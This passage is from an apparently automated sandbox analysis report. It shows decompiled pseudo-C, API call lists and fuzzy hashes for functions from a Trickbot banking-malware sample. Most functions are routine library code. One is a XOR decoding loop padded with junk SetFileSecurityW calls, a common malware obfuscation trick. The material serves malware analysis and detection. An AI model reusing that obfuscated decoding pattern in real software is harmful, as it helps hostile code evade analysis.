                          							_t9 = 0;
                          							__eflags = 0;
                          							_t40 = 0x10;
                          						}
                          						_t40 = 1 + _t40;
                          						__eflags = _t40 - 6;
                          					} while (__eflags < 0);
                          					if(__eflags == 0) {
                          						__eflags = _t9 - E00411AF0;
                          						if(__eflags != 0) {
                          							_t15 = GetPropA(_t49, 0);
                          							__eflags = _t15;
                          							if(_t15 != 0) {
                          								L12:
                          								__eflags = 0;
                          								SetPropA(_t49, 0, 1);
                          							} else {
                          								_t21 = GetPropA(_t49, 0);
                          								__eflags = _t21;
                          								if(_t21 != 0) {
                          									goto L12;
                          								} else {
                          									_t24 = GetPropA(_t49, 0);
                          									__eflags = _t24;
                          									if(_t24 != 0) {
                          										goto L12;
                          									}
                          								}
                          							}
                          						} else {
                          							_t25 = E00410610(__eflags, _t49, _t40);
                          							RemovePropA(_t49, 0);
                          							SetWindowLongA(_t49, 0xfffffffc, _t25);
                          						}
                          					}
                          					_t45 = GetWindow(_t49, 5);
                          					__eflags = _t45;
                          					while(_t45 != 0) {
                          						E00410F40(_t10, _t37, _t42, _t45);
                          						_t45 = GetWindow(_t45, 2);
                          						__eflags = _t45;
                          					}
                          					return 1;
                          				} else {
                          					return 0;
                          				}
                          			}

                          APIs
                          • GetWindowLongA.USER32(?,000000FC), ref: 00410F5D
                          • RemovePropA.USER32(?,00000000), ref: 00410F93
                          • SetWindowLongA.USER32(?,000000FC,00000000), ref: 00410F99
                          • RemovePropA.USER32(?,00000000), ref: 00410FC7
                          • SetWindowLongA.USER32(?,000000FC,00000000), ref: 00410FCD
                          • GetWindow.USER32(?,00000005), ref: 00411022
                          • GetWindow.USER32(00000000,00000002), ref: 00411033
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$Long$PropRemove
                          • String ID:
                          • API String ID: 3256693057-0
                          • Opcode ID: 64cac4bf1b8b2b0dd676f4c8ee39d47b17cc52b9532cc6d9b23ba9b0328e075e
                          • Instruction ID: 3f54d679407ba834f3b5476e11c3977a5f29ff7089c908982676509a0f4f04c7
                          • Opcode Fuzzy Hash: 64cac4bf1b8b2b0dd676f4c8ee39d47b17cc52b9532cc6d9b23ba9b0328e075e
                          • Instruction Fuzzy Hash: 0121047B6000253AD751AB78AC01EFF279CDB8A354B110136FA00D2251FBA98CC3877E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402E40(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                          				intOrPtr _t13;
                          				signed int _t25;
                          				intOrPtr _t30;
                          				intOrPtr _t32;
                          				signed int _t38;
                          				intOrPtr _t43;
                          				void* _t45;
                          
                          				_t13 = _a12;
                          				_t38 = 0;
                          				if(_t13 != 0) {
                          					_t32 = _a8;
                          					_t43 = _a4;
                          					do {
                          						SetFileSecurityW(0, 0, 0);
                          						SetFileSecurityW(0, 0, 0);
                          						SetFileSecurityW(0, 0, 0);
                          						SetFileSecurityW(0, 0, 0);
                          						SetFileSecurityW(0, 0, 0);
                          						SetFileSecurityW(0, 0, 0);
                          						SetFileSecurityW(0, 0, 0);
                          						SetFileSecurityW(0, 0, 0);
                          						SetFileSecurityW(0, 0, 0);
                          						SetFileSecurityW(0, 0, 0);
                          						SetFileSecurityW(0, 0, 0);
                          						_t25 = E004050FE(_t43);
                          						_t45 = _t45 + 4;
                          						 *(_t38 + _t32) =  *(_t38 + _t32) ^  *(_t43 + _t38 % _t25 * 2);
                          						_t30 = _a12;
                          						_t38 = _t38 + 1;
                          					} while (_t38 != _t30);
                          					return _t30;
                          				}
                          				return _t13;
                          			}

                          APIs
                          • SetFileSecurityW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,004031B4,00000000,00000000,00000000), ref: 00402E66
                          • SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402E6E
                          • SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402E76
                          • SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402E7E
                          • SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402E86
                          • SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402E8E
                          • SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402E96
                          • SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402E9E
                          • SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402EA6
                          • SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402EAE
                          • SetFileSecurityW.ADVAPI32(00000000,00000000,00000000), ref: 00402EB6
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: FileSecurity
                          • String ID:
                          • API String ID: 200422441-0
                          • Opcode ID: ab51d9e2ea5fa16e1d901246b7368571613d6852a14defd374ddf01b1257bcaf
                          • Instruction ID: cd41f3dbe253b9f5e7589d4e6c532eb06652257514d45199ff00fec08aee85ce
                          • Opcode Fuzzy Hash: ab51d9e2ea5fa16e1d901246b7368571613d6852a14defd374ddf01b1257bcaf
                          • Instruction Fuzzy Hash: B01100317C83693AF67196AA5C47F5B6E959B45FA1F240016F74C7E1C0C9D074018AAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E00431F3B(void* __ecx, void* __edi) {
                          				void* __esi;
                          				char* _t78;
                          				void* _t83;
                          				intOrPtr* _t84;
                          				char* _t85;
                          				void* _t93;
                          				char* _t119;
                          				void* _t129;
                          				char* _t130;
                          				intOrPtr* _t134;
                          				intOrPtr _t137;
                          				char* _t160;
                          				intOrPtr _t163;
                          				intOrPtr* _t165;
                          				long _t167;
                          				void* _t168;
                          				void* _t170;
                          				void* _t171;
                          				void* _t173;
                          
                          				_t137 =  *((intOrPtr*)(__ecx + 0x80));
                          				E00405340(E004388B4, _t168);
                          				_t171 = _t170 - 0x18;
                          				_t78 =  *0x447478; // 0x44748c
                          				_t163 = _t137;
                          				 *(_t168 - 0x20) = _t78;
                          				 *(_t168 - 4) =  *(_t168 - 4) & 0x00000000;
                          				 *(_t168 - 0x10) = _t78;
                          				 *(_t168 - 4) = 1;
                          				E0041DA3F(_t163,  *((intOrPtr*)(E00432562() + 8)), _t168 - 0x20);
                          				_t134 =  *((intOrPtr*)(_t163 + 8));
                          				if(_t134 != 0) {
                          					_t160 = "command";
                          					do {
                          						_t84 = _t134;
                          						_t134 =  *_t134;
                          						_t165 =  *((intOrPtr*)(_t84 + 8));
                          						_t85 =  *0x447478; // 0x44748c
                          						 *(_t168 - 0x18) = _t85;
                          						 *(_t168 - 0x14) = _t85;
                          						 *(_t168 - 0x1c) = _t85;
                          						_push(5);
                          						_push(_t168 - 0x14);
                          						 *(_t168 - 4) = 4;
                          						if( *((intOrPtr*)( *_t165 + 0x64))() != 0 &&  *((intOrPtr*)( *(_t168 - 0x14) - 8)) != 0) {
                          							_t93 =  *((intOrPtr*)( *_t165 + 0x64))(_t168 - 0x1c, 6);
                          							_t181 = _t93;
                          							if(_t93 == 0) {
                          								E00417FB5(_t168 - 0x1c, _t168, _t168 - 0x14);
                          							}
                          							E004155CC(_t168 - 0x10, "%s\\DefaultIcon",  *(_t168 - 0x14));
                          							_t173 = _t171 + 0xc;
                          							E00433344(_t181,  *(_t168 - 0x10));
                          							_push(0);
                          							_push(_t168 - 0x10);
                          							if( *((intOrPtr*)( *_t165 + 0x64))() == 0) {
                          								L9:
                          								_push("ddeexec");
                          								E004155CC(_t168 - 0x10, "%s\\shell\\open\\%s",  *(_t168 - 0x14));
                          								E00433344(_t183,  *(_t168 - 0x10));
                          								_push("ddeexec");
                          								E004155CC(_t168 - 0x10, "%s\\shell\\print\\%s",  *(_t168 - 0x14));
                          								E00433344(_t183,  *(_t168 - 0x10));
                          								_push("ddeexec");
                          								E004155CC(_t168 - 0x10, "%s\\shell\\printto\\%s",  *(_t168 - 0x14));
                          								_t173 = _t173 + 0x30;
                          								E00433344(_t183,  *(_t168 - 0x10));
                          							} else {
                          								_t130 =  *(_t168 - 0x10);
                          								_t183 =  *((intOrPtr*)(_t130 - 8));
                          								if( *((intOrPtr*)(_t130 - 8)) == 0) {
                          									goto L9;
                          								}
                          							}
                          							E004155CC(_t168 - 0x10, "%s\\shell\\open\\%s",  *(_t168 - 0x14));
                          							E00433344(_t183,  *(_t168 - 0x10));
                          							E004155CC(_t168 - 0x10, "%s\\shell\\print\\%s",  *(_t168 - 0x14));
                          							E00433344(_t183,  *(_t168 - 0x10));
                          							E004155CC(_t168 - 0x10, "%s\\shell\\printto\\%s",  *(_t168 - 0x14));
                          							_t171 = _t173 + 0x30;
                          							E00433344(_t183,  *(_t168 - 0x10));
                          							 *((intOrPtr*)( *_t165 + 0x64))(_t168 - 0x18, 4, _t160, _t160, _t160);
                          							_t119 =  *(_t168 - 0x18);
                          							_t184 =  *((intOrPtr*)(_t119 - 8));
                          							if( *((intOrPtr*)(_t119 - 8)) != 0) {
                          								 *(_t168 - 0x24) = 0x208;
                          								_t167 = RegQueryValueA(0x80000000, _t119, E004181F7(_t168 - 0x10, _t168, 0x208), _t168 - 0x24);
                          								E00418246(_t168 - 0x10, _t184, 0xffffffff);
                          								if(_t167 != 0) {
                          									L14:
                          									E004155CC(_t168 - 0x10, "%s\\ShellNew",  *(_t168 - 0x18));
                          									_t171 = _t171 + 0xc;
                          									E00433344(_t187,  *(_t168 - 0x10));
                          									E00433344(_t187,  *(_t168 - 0x18));
                          								} else {
                          									_t128 =  *(_t168 - 0x10);
                          									if( *((intOrPtr*)( *(_t168 - 0x10) - 8)) == _t167) {
                          										goto L14;
                          									} else {
                          										_t129 = E0040504F(_t128,  *(_t168 - 0x14));
                          										_t187 = _t129;
                          										if(_t129 == 0) {
                          											goto L14;
                          										}
                          									}
                          								}
                          							}
                          						}
                          						 *(_t168 - 4) = 3;
                          						E00417EC8(_t168 - 0x1c);
                          						 *(_t168 - 4) = 2;
                          						E00417EC8(_t168 - 0x14);
                          						 *(_t168 - 4) = 1;
                          						E00417EC8(_t168 - 0x18);
                          					} while (_t134 != 0);
                          				}
                          				 *(_t168 - 4) =  *(_t168 - 4) & 0x00000000;
                          				E00417EC8(_t168 - 0x10);
                          				 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
                          				_t83 = E00417EC8(_t168 - 0x20);
                          				 *[fs:0x0] =  *((intOrPtr*)(_t168 - 0xc));
                          				return _t83;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 004334B0
                            • Part of subcall function 0041DA3F: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0041DA59
                            • Part of subcall function 0041DA3F: GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 0041DA71
                          • RegQueryValueA.ADVAPI32(80000000,?,00000000,00000208), ref: 0043366E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Name$FileH_prologModulePathQueryShortValue
                          • String ID: %s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$command$ddeexec
                          • API String ID: 365916388-556638191
                          • Opcode ID: d173c4286ba12df0bf125d78ad2e4b67d5874ad7ccaf50a260126a686e732af9
                          • Instruction ID: d390e32400513a69a9b0881177cd2a7855cbf6ce13e271ea9eae0ee46f2cc8ea
                          • Opcode Fuzzy Hash: d173c4286ba12df0bf125d78ad2e4b67d5874ad7ccaf50a260126a686e732af9
                          • Instruction Fuzzy Hash: BA716C7190021AABDF11EFE5CD46AEEBBB9AF08705F10046EF511B3291DB785A44CB58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004091B0() {
                          				int _v4;
                          				int _v8;
                          				intOrPtr _t7;
                          				CHAR* _t9;
                          				WCHAR* _t17;
                          				int _t20;
                          				char* _t24;
                          				int _t32;
                          				CHAR* _t36;
                          				WCHAR* _t38;
                          				void* _t39;
                          				int _t42;
                          
                          				_t7 =  *0x44b944; // 0x1
                          				_t32 = 0;
                          				_t38 = 0;
                          				_t36 = 0;
                          				if(_t7 != 0) {
                          					if(_t7 != 1) {
                          						if(_t7 != 2) {
                          							L27:
                          							return 0;
                          						}
                          						L18:
                          						if(_t36 != _t32) {
                          							L20:
                          							_t9 = _t36;
                          							if( *_t36 == _t32) {
                          								L23:
                          								_t41 = _t9 - _t36 + 1;
                          								_t39 = E0040511B(_t9 - _t36 + 1);
                          								if(_t39 != _t32) {
                          									E00405400(_t39, _t36, _t41);
                          								} else {
                          									_t39 = 0;
                          								}
                          								FreeEnvironmentStringsA(_t36);
                          								return _t39;
                          							} else {
                          								goto L21;
                          							}
                          							do {
                          								do {
                          									L21:
                          									_t9 =  &(_t9[1]);
                          								} while ( *_t9 != _t32);
                          								_t9 =  &(_t9[1]);
                          							} while ( *_t9 != _t32);
                          							goto L23;
                          						}
                          						_t36 = GetEnvironmentStrings();
                          						if(_t36 == _t32) {
                          							goto L27;
                          						}
                          						goto L20;
                          					}
                          					L6:
                          					if(_t38 != _t32) {
                          						L8:
                          						_t17 = _t38;
                          						if( *_t38 == _t32) {
                          							L11:
                          							_t20 = (_t17 - _t38 >> 1) + 1;
                          							_v4 = _t20;
                          							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
                          							if(_t42 != _t32) {
                          								_t24 = E0040511B(_t42);
                          								_v8 = _t24;
                          								if(_t24 != _t32) {
                          									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
                          										_t4 =  &_v8; // 0x40523d
                          										E004053B8( *_t4);
                          										_v8 = _t32;
                          									}
                          									_t6 =  &_v8; // 0x40523d
                          									_t32 =  *_t6;
                          								}
                          							}
                          							FreeEnvironmentStringsW(_t38);
                          							return _t32;
                          						} else {
                          							goto L9;
                          						}
                          						do {
                          							do {
                          								L9:
                          								_t17 =  &(_t17[1]);
                          							} while ( *_t17 != _t32);
                          							_t17 =  &(_t17[1]);
                          						} while ( *_t17 != _t32);
                          						goto L11;
                          					}
                          					_t38 = GetEnvironmentStringsW();
                          					if(_t38 == _t32) {
                          						goto L27;
                          					}
                          					goto L8;
                          				}
                          				_t38 = GetEnvironmentStringsW();
                          				if(_t38 == 0) {
                          					_t36 = GetEnvironmentStrings();
                          					if(_t36 == 0) {
                          						goto L27;
                          					}
                          					 *0x44b944 = 2;
                          					goto L18;
                          				}
                          				 *0x44b944 = 1;
                          				goto L6;
                          			}

                          0x004091b2
                          0x004091c1
                          0x004091c3
                          0x004091c5
                          0x004091c9
                          0x00409201
                          0x0040928b
                          0x004092d9
                          0x00000000
                          0x004092d9
                          0x0040928d
                          0x0040928f
                          0x0040929d
                          0x0040929f
                          0x004092a1
                          0x004092ad
                          0x004092b0
                          0x004092b8
                          0x004092bd
                          0x004092c6
                          0x004092bf
                          0x004092bf
                          0x004092bf
                          0x004092cf
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004092a3
                          0x004092a3
                          0x004092a3
                          0x004092a3
                          0x004092a4
                          0x004092a8
                          0x004092a9
                          0x00000000
                          0x004092a3
                          0x00409297
                          0x0040929b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040929b
                          0x00409207
                          0x00409209
                          0x00409217
                          0x0040921a
                          0x0040921c
                          0x0040922c
                          0x00409238
                          0x0040923f
                          0x00409245
                          0x00409249
                          0x0040924c
                          0x00409254
                          0x00409258
                          0x00409269
                          0x0040926b
                          0x0040926f
                          0x00409275
                          0x00409275
                          0x00409279
                          0x00409279
                          0x00409279
                          0x00409258
                          0x0040927e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040921e
                          0x0040921e
                          0x0040921e
                          0x0040921f
                          0x00409220
                          0x00409226
                          0x00409227
                          0x00000000
                          0x0040921e
                          0x0040920d
                          0x00409211
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00409211
                          0x004091cd
                          0x004091d1
                          0x004091e5
                          0x004091e9
                          0x00000000
                          0x00000000
                          0x004091ef
                          0x00000000
                          0x004091ef
                          0x004091d3
                          0x00000000

                          APIs
                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040523D), ref: 004091CB
                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040523D), ref: 004091DF
                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040523D), ref: 0040920B
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040523D), ref: 00409243
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040523D), ref: 00409265
                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0040523D), ref: 0040927E
                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040523D), ref: 00409291
                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004092CF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                          • String ID: =R@
                          • API String ID: 1823725401-765710743
                          • Opcode ID: c0bd49d0e153b6461becdb98ce4de4cf4f08ef4301ec3e3f50a862544bd5774d
                          • Instruction ID: 7e9765a9e3b7d132753b7977d9a1b269c0ef5939c90707fe0a2d63200c5401f3
                          • Opcode Fuzzy Hash: c0bd49d0e153b6461becdb98ce4de4cf4f08ef4301ec3e3f50a862544bd5774d
                          • Instruction Fuzzy Hash: 2331CAB25092157FEB207B745C8483BB69CE6453547150DBFF942F32C2E6794C41866D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041D5C2(void* _a4, intOrPtr _a8) {
                          				void* _v8;
                          				void* _v12;
                          				int _v16;
                          				int _v20;
                          				void* __ebp;
                          				long _t28;
                          				char* _t30;
                          				long _t32;
                          				signed int _t37;
                          				void* _t47;
                          
                          				_t37 = 0;
                          				_v12 = 0;
                          				if(RegOpenKeyA(0x80000000, "CLSID",  &_v12) == 0) {
                          					_v8 = 0;
                          					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
                          						_a4 = 0;
                          						_t28 = RegOpenKeyA(_v8, "InProcServer32",  &_a4);
                          						_t50 = _t28;
                          						if(_t28 == 0) {
                          							_t30 = E004181F7(_a8, _t47, 0x104);
                          							_v16 = 0x104;
                          							_t32 = RegQueryValueExA(_a4, 0x449350, 0,  &_v20, _t30,  &_v16);
                          							E00418246(_a8, _t50, 0xffffffff);
                          							_t37 = 0 | _t32 == 0x00000000;
                          							RegCloseKey(_a4);
                          						}
                          						RegCloseKey(_v8);
                          					}
                          					RegCloseKey(_v12);
                          				}
                          				return _t37;
                          			}


                          0x0041d5d4
                          0x0041d5e0
                          0x0041d5e7
                          0x0041d5ee
                          0x0041d601
                          0x0041d606
                          0x0041d612
                          0x0041d614
                          0x0041d616
                          0x0041d621
                          0x0041d629
                          0x0041d63b
                          0x0041d648
                          0x0041d657
                          0x0041d659
                          0x0041d659
                          0x0041d65e
                          0x0041d65e
                          0x0041d663
                          0x0041d665
                          0x0041d66b

                          APIs
                          • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 0041D5E3
                          • RegOpenKeyA.ADVAPI32(?,?,00000001), ref: 0041D5F7
                          • RegOpenKeyA.ADVAPI32(00000001,InProcServer32,?), ref: 0041D612
                          • RegQueryValueExA.ADVAPI32(?,00449350,00000000,?,00000000,?,00000104), ref: 0041D63B
                            • Part of subcall function 00418246: lstrlenA.KERNEL32(00000000,00000100,0041C6F4,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,?,?), ref: 00418259
                          • RegCloseKey.ADVAPI32(?,000000FF), ref: 0041D659
                          • RegCloseKey.ADVAPI32(00000001), ref: 0041D65E
                          • RegCloseKey.ADVAPI32(?), ref: 0041D663
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CloseOpen$QueryValuelstrlen
                          • String ID: CLSID$InProcServer32
                          • API String ID: 1568031711-323508013
                          • Opcode ID: 9e374ce3edbf7e8dd3553cd402a526af76ddfd4d29e037a88c58b91dacf66982
                          • Instruction ID: 015957d6291dc9e98ce5539027297fd1a0eb0d51e1877ccc92742f519abc29cc
                          • Opcode Fuzzy Hash: 9e374ce3edbf7e8dd3553cd402a526af76ddfd4d29e037a88c58b91dacf66982
                          • Instruction Fuzzy Hash: EF113A72D0021CBBDB10AFA5CC81DDEBB79EF48394B10406AF914A3250D6749E50DB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00430A66() {
                          				int _t1;
                          				int _t7;
                          				struct HDC__* _t12;
                          				void* _t18;
                          
                          				_t1 =  *0x4478fc; // 0xffffffff
                          				if(_t1 == 0xffffffff) {
                          					_t12 = GetDC(0);
                          					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
                          					if(_t18 != 0) {
                          						_t18 = SelectObject(_t12, _t18);
                          					}
                          					GetCharWidthA(_t12, 0x36, 0x36, 0x4478fc);
                          					if(_t18 != 0) {
                          						SelectObject(_t12, _t18);
                          						DeleteObject(_t18);
                          					}
                          					ReleaseDC(0, _t12);
                          					_t7 =  *0x4478fc; // 0xffffffff
                          					return _t7;
                          				}
                          				return _t1;
                          			}


                          0x00430a66
                          0x00430a6e
                          0x00430a95
                          0x00430aaa
                          0x00430aae
                          0x00430ab4
                          0x00430ab4
                          0x00430ac0
                          0x00430ac8
                          0x00430acc
                          0x00430acf
                          0x00430acf
                          0x00430ad7
                          0x00430add
                          0x00000000
                          0x00430ae5
                          0x00430ae6

                          APIs
                          • GetDC.USER32(00000000), ref: 00430A77
                          • GetSystemMetrics.USER32(00000048), ref: 00430A97
                          • CreateFontA.GDI32(00000000,?,?,?,?,00430BFF,?,?,?,?,?,?,?), ref: 00430A9E
                          • SelectObject.GDI32(00000000,00000000), ref: 00430AB2
                          • GetCharWidthA.GDI32(00000000,00000036,00000036,004478FC), ref: 00430AC0
                          • SelectObject.GDI32(00000000,00000000), ref: 00430ACC
                          • DeleteObject.GDI32(00000000), ref: 00430ACF
                          • ReleaseDC.USER32(00000000,00000000), ref: 00430AD7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                          • String ID: Marlett
                          • API String ID: 1397664628-3688754224
                          • Opcode ID: d5e5477c3dff95d3c89747f714b27051cefc33f4dec30f0d15f1dff9f5d6b730
                          • Instruction ID: bd86b06498bf5005314426fb292b08be16bcad8ca1308705f795db1032c99aad
                          • Opcode Fuzzy Hash: d5e5477c3dff95d3c89747f714b27051cefc33f4dec30f0d15f1dff9f5d6b730
                          • Instruction Fuzzy Hash: 6E01A231A003507BD7316B776C8DDAB3E3CDBD7FA1F001629F621A219186A94C01C678
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E00403D70(void* __ecx) {
                          				long _v4;
                          				struct tagRECT _v20;
                          				struct tagRECT _v36;
                          				struct tagRECT _v52;
                          				struct tagRECT _v68;
                          				struct tagRECT _v84;
                          				struct tagRECT _v100;
                          				struct tagRECT _v116;
                          				struct tagRECT _v132;
                          				intOrPtr _v136;
                          				struct tagRECT _v152;
                          				signed int _t115;
                          				long* _t116;
                          				long _t143;
                          				void* _t155;
                          				intOrPtr _t162;
                          				int _t164;
                          				signed int _t166;
                          				intOrPtr _t167;
                          				void* _t186;
                          				intOrPtr _t187;
                          				intOrPtr _t195;
                          				long _t215;
                          				intOrPtr _t221;
                          				void* _t228;
                          				long* _t229;
                          
                          				_t228 = __ecx;
                          				_t115 = GetSystemMetrics(5);
                          				_t229 = _t228 + 4;
                          				_t164 = _t115 * 8 - _t115;
                          				_t116 = _t229;
                          				_v152.left =  *_t116;
                          				_v152.top = _t116[1];
                          				_v152.right = _t116[2];
                          				_v152.bottom = _t116[3];
                          				InflateRect( &_v152, _t164,  ~_t164);
                          				_v52.top = _v152.top;
                          				_v52.left = _v152.left;
                          				_v52.right =  *_t229;
                          				_v52.bottom =  *((intOrPtr*)(_t228 + 8));
                          				OffsetRect( &_v52, 4, 0xfffffffc);
                          				 *0x449660 = _v52.left;
                          				 *0x449668 = _v52.right;
                          				 *0x449664 = _v52.top;
                          				 *0x44966c = _v52.bottom;
                          				_v84.top = _v152.top;
                          				_v84.left =  *(_t228 + 0xc);
                          				_v84.right = _v152.right;
                          				_v84.bottom =  *((intOrPtr*)(_t228 + 8));
                          				OffsetRect( &_v84, 0xfffffffc, 0xfffffffc);
                          				 *0x449670 = _v84.left;
                          				 *0x449674 = _v84.top;
                          				 *0x449678 = _v84.right;
                          				 *0x44967c = _v84.bottom;
                          				_v132.left =  *(_t228 + 0xc);
                          				_v132.top =  *((intOrPtr*)(_t228 + 0x10));
                          				_v132.right = _v152.right;
                          				_v132.bottom = _v152.bottom;
                          				OffsetRect( &_v132, 0xfffffffc, 4);
                          				 *0x449680 = _v132.left;
                          				 *0x449684 = _v132.top;
                          				 *0x449688 = _v132.right;
                          				 *0x44968c = _v132.bottom;
                          				_v116.top =  *((intOrPtr*)(_t228 + 0x10));
                          				_v116.left = _v152.left;
                          				_v116.right =  *_t229;
                          				_v116.bottom = _v152.bottom;
                          				OffsetRect( &_v116, 4, 4);
                          				 *0x449694 = _v116.top;
                          				_t215 = _v152.left;
                          				 *0x449698 = _v116.right;
                          				 *0x449690 = _v116.left;
                          				asm("cdq");
                          				 *0x44969c = _v116.bottom;
                          				_t186 = (_v152.right - _t215 - _t215 >> 1) + _v152.left;
                          				asm("cdq");
                          				_t166 = _t164 - _t215 >> 1;
                          				_t187 = _t186 + _t166;
                          				_t143 = _t186 - _t166;
                          				_v136 = _t187;
                          				_v100.right = _t187;
                          				_v4 = _t143;
                          				_v100.left = _t143;
                          				_v100.top = _v152.top;
                          				_v100.bottom =  *((intOrPtr*)(_t228 + 8));
                          				OffsetRect( &_v100, 0, 0xfffffffc);
                          				 *0x4496a0 = _v100.left;
                          				 *0x4496a4 = _v100.top;
                          				 *0x4496a8 = _v100.right;
                          				 *0x4496ac = _v100.bottom;
                          				_v68.top =  *((intOrPtr*)(_t228 + 0x10));
                          				_v68.left = _v4;
                          				_v68.right = _v136;
                          				_v68.bottom = _v152.bottom;
